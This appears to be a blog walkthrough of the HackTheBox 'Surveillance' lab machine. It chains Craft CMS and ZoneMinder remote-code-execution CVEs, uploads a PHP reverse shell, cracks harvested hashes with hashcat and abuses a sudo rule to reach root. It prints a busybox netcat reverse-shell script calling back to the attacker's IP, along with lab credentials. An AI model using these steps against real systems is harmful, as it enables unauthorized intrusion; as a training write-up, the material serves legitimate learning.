HackTheBox — Surveillance Writeup

Gerardo Torres
9 min readMar 17, 2024

--

Here is the writeup for another HackTheBox machine; this time, we have “Surveillance” created by TheCyberGeek & TRX.

Enumeration

Let’s start by conducting an Nmap scan, using the following parameters: -sV for version enumeration, -sC for default scripts, -p-to scan all ports, -T4to expedite the scan, and -oN to save the scan results to the file nmap.txt.

# Nmap 7.80 scan initiated Wed Mar  6 10:25:27 2024 as: nmap -sVC -p- -T4 -oN nmap.txt 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 6 10:25:53 2024 -- 1 IP address (1 host up) scanned in 26.25 seconds

The Nmap scan unveiled two open TCP ports: port 22, which is running OpenSSH, and port 80, hosting a web server. It appears that we need to append surveillance.htbto our /etc/hostsfile, let’s do that first.

80 — HTTP

Navigating to the website at http://surveillance.htb/, we find the home page.

The website indicates that it is powered by Craft CMS. Craft CMS is a tool that offers powerful content modeling and organizational tools for projects. It is constructed on YII2, a PHP framework.

First, let’s check if there is a robots.txt file that may provide us with some information. The robots.txt file is used to instruct web crawlers about which parts of the website they are disallowed to scan.

However, it appears that there is no such file. So, let’s examine the source code to see if there’s anything of interest there.

After a quick scan of the source code, we discovered that the website is running Craft CMS version 4.4.14. Now that we have the version information, let’s search if there are any known vulnerabilities associated with it that we can potentially exploit.

CVE-2023–41892

Great, there is an unauthenticated remote code execution (RCE) vulnerability that affects Craft CMS version 4.0.0-RC1 to 4.4.14, which applies to our version.

This exploit leverages a method that permits the inclusion of arbitrary files, potentially enabling an attacker to inject PHP code into the log file.

If you are interested in learning more about how this exploit works, I found the article above helpful for getting a better understanding of it.

Now, onto the exploitation. We just need to execute the Python script from the GitHub and provide it with the URL, http://surveillance.htb/. This grants us a shell as the www-datauser. However, it seems that we are confined to the /var/www/html/craft/web directory.

We know that the website supports PHP files, so let’s test whether we can execute our own PHP files.

First, I created a super simple test.phpfile and ran it from the browser.

And it worked! So let’s upload a reverse shell from reverseshells.com. I’ll be using thePHP PentestMonkeywith bashfor my shell, as I have found it to be pretty reliable.

Now let’s set up a Netcat listener and visit http://surveillance.htb/rev.php.

First of all, let’s upgrade the shell using the following commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

stty raw -echo; fg

reset

# If it asks what type of shell say
xterm-256color

export TERM=xterm-256color
export SHELL=bash

www-data PrivEsc

After upgrading the shell, I first looked at the .envfile, which displays the environment variables and can sometimes provide useful information.

We discover some potential MySQL database credentials: craftuser:CraftCMSPassword2023!.

I attempted to access the MySQL database.

And we gained access! Within the craftdbdatabase, we find a userstable containing admin credentials.

Let’s determine the type of hash used.

We identify that it is bcrypt $2*$, which corresponds to the Blowfish (Unix) algorithm. I then attempted to crack it with hashcat using mode -m 3200, a wordlist attack -a 0 , and utilizing the rockyou password list.

hashcat -m 3200 -a 0 hash /usr/share/wordlist/rockyou.txt

While it was running, it was taking longer than usual, leading me to believe that it might not yield any results. Therefore, while it was still running, I continued with further enumeration and discovered a backup folder containing an .sql.zipfile.

After unzipping the file and retrieving the users table, we found some additional credentials for admin, which belong to the user matthew.

Using hashes.com again, we determine the type of hash used.

It seems to be a SHA256hash. So, let’s crack it using the same syntax as before but with mode -m 1400, which corresponds to the SHA256hash.

hashcat -m 1400 -a 0 hash /usr/share/wordlist/rockyou.txt

And there we go! In only 3 seconds, we have a potential password for the user matthew.

matthew PrivEsc

Let’s utilize the password we found and establish a connection as matthew using SSH.

We also retrieve the user.txtfile, thus obtaining the first flag.

I checked for sudo privileges, but we have none.

Similarly, when looking for files with SUID permissions, I found none that stood out. I also examined the kernel version and cronjobs, but there was nothing exploitable that I could identify. Let’s proceed to run LinPEAS.

The first thing that caught my attention was some configuration files for Zoneminder.

Going down a bit more, I found a set of database credentials for the Zoneminder service.

In one of the configuration files that LinPEAS showed us, we can see this service is running locally at 127.0.0.1:8080. So, let’s set up port forwarding with SSH.

127.0.0.1:8080 — HTTP

Going to 127.0.0.1:1337, we find the homepage of the website.

I attempted to use some default credentials like admin:admin and I also tried zoneminder:ZoneMinderPassword2023, but unfortunately, I had no luck. Conducting further enumeration on the website did not reveal anything of interest. Let’s proceed to see if we find a version number or any other useful information in the configuration files.

Going to /usr/share/zoneminder/www/api/app/Config, we find the version number. Let’s search to see if this version is vulnerable.

CVE-2023–26035

We discover that this version of Zoneminder is vulnerable to Remote Code Execution (RCE). Let’s start by testing if it works by sending an ICMP request to ourselves from the website.

The command is executed correctly.

Using tcpdumpand listening to the tun0 interface, we see the TCP handshake occurring between my device and the website. Now, it’s time to send a reverse shell.

Listing on port 8888 with Netcat, we establish a connection back as thezoneminderuser. I also upgraded the shell using the same commands as before.

zoneminder PrivEsc

I first checked for sudo privileges.

We can run /usr/bin/zm[a-zA-Z]*.pl *with sudo privileges. This means we can execute any of the following Perl files with sudo privileges:

After some research, I found that you are able to run commands by taking advantage of the zmupdate.plfile.

However, this didn’t work. After some further searching around, I came across a similar vulnerability that also uses the zmupdate.plfile, but with a different syntax.

The only problem is that I don’t receive the output from the commands that I run. Therefore, I’ll copy the root.txtfile into the /tmpdirectory and make it readable.

And with this, we obtain the root flag root.txt.

However, it’s no fun if we don’t manage to become root, so let’s give it a try.

root

For this, let’s return to revshells.com.

#!/bin/bash
busybox nc 10.10.14.146 7777 -e bash

I created this reverse shell script on my local machine and used a Python web server along with wgetto transfer the file. Then, I made it executable by changing its permissions.

And we became root!

You can probably achieve root access using various methods such as changing root’s password or setting the SUID bit on a binary that allows privilege escalation, among others. However, I opted to do it this way.

If after reading the writeup you have any feedback regarding the article or suggestions for improving my methodology in tackling this machine, please feel free to leave a comment on the article or reach out to me directly. I constantly strive to enhance my skills and learn new techniques, so your input is highly valued. Thanks for the support!

--

--

Gerardo Torres

I am a cybersecurity enthusiast specializing in web and network penetration testing, committed to continuous improvement and learning.